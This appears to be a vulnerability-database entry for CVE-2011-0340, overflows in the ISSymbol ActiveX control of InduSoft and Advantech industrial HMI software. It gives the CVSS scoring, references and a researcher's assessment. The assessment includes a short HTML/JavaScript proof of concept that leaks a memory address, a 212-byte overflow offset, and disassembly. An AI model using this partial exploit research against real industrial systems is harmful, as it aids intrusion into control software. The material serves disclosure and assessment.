9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method.
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
The ForceRemoteBehavior getter, when using an “unitialized” issymbol
object allows to disclose address from issymbol. Issymbol isn’t aslr
compatible, but could rebase. Anyway, issymbol doesn’t contain pointers
to interesting API’s for ASLR bypass, so even when it would be easy
to use the issymbol.dll it won’t be usefull because of this.
<html>
<body>
<object classid='clsid:3c9dff6f-5cb0-422e-9978-d6405d10718f' id='test'></object>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language='javascript'>
alert(test.ForceRemoteBehavior);
</script>
</body>
</html>
Overflowing the vulnerable InternationalSeparator() method with 212 bytes
allows to reach the pointer to the StartupColumnTranslate property (string).
By overflowing this pointer should be possible to retrieve arbitrary data
from the memory map by using the StartupColumnTranslate getter:
.text:1000EF40 StartupColumnTranslate_sub_1000EF40 proc near ; DATA XREF: .rdata:101DCE98o
.text:1000EF40
.text:1000EF40 var_10 = byte ptr -10h
.text:1000EF40 var_C = dword ptr -0Ch
.text:1000EF40 var_4 = dword ptr -4
.text:1000EF40
.text:1000EF40 push 0FFFFFFFFh
.text:1000EF42 push offset sub_101B7579
.text:1000EF47 mov eax, large fs:0
.text:1000EF4D push eax
.text:1000EF4E push ecx
.text:1000EF4F push esi
.text:1000EF50 mov eax, ___security_cookie
.text:1000EF55 xor eax, esp
.text:1000EF57 push eax
.text:1000EF58 lea eax, [esp+18h+var_C]
.text:1000EF5C mov large fs:0, eax
.text:1000EF62 add ecx, 2540h ; ecx + 2540h => pointer to StartupColumnTranslate property
.text:1000EF68 push ecx
.text:1000EF69 lea ecx, [esp+1Ch+var_10]
.text:1000EF6D call ds:??0?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@ABV01@@Z ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>> const &)
.text:1000EF73 lea ecx, [esp+18h+var_10]
.text:1000EF77 mov [esp+18h+var_4], 0
.text:1000EF7F call ds:?AllocSysString@?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QBEPA_WXZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::AllocSysString(void)
.text:1000EF85 lea ecx, [esp+18h+var_10] ; void *
.text:1000EF89 mov esi, eax
.text:1000EF8B call ds:__imp_??1?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@XZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::~CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(void)
.text:1000EF91 mov eax, esi
.text:1000EF93 mov ecx, [esp+18h+var_C]
.text:1000EF97 mov large fs:0, ecx
.text:1000EF9E pop ecx
.text:1000EF9F pop esi
.text:1000EFA0 add esp, 10h
.text:1000EFA3 retn
.text:1000EFA3 StartupColumnTranslate_sub_1000EF40 endp
PROBLEM: It’s using the Microsoft Foundation Classes, and create fake
strings memory objects in memory isn’t so easy! We should dig in to that,
should be possible with more work!
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
ics-cert.us-cert.gov/advisories/ICSA-12-249-03
secunia.com/advisories/42928
secunia.com/advisories/43116
secunia.com/secunia_research/2011-36
secunia.com/secunia_research/2011-37
www.advantechdirect.com/eMarketingPrograms/AStudio_Patch/AStudio7.0_Patch_Final.htm
www.indusoft.com/hotfixes/hotfixes.php
www.securityfocus.com/bid/47596
www.us-cert.gov/control_systems/pdf/ICSA-12-137-02.pdf
www.vupen.com/english/advisories/2011/1115
www.vupen.com/english/advisories/2011/1116
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340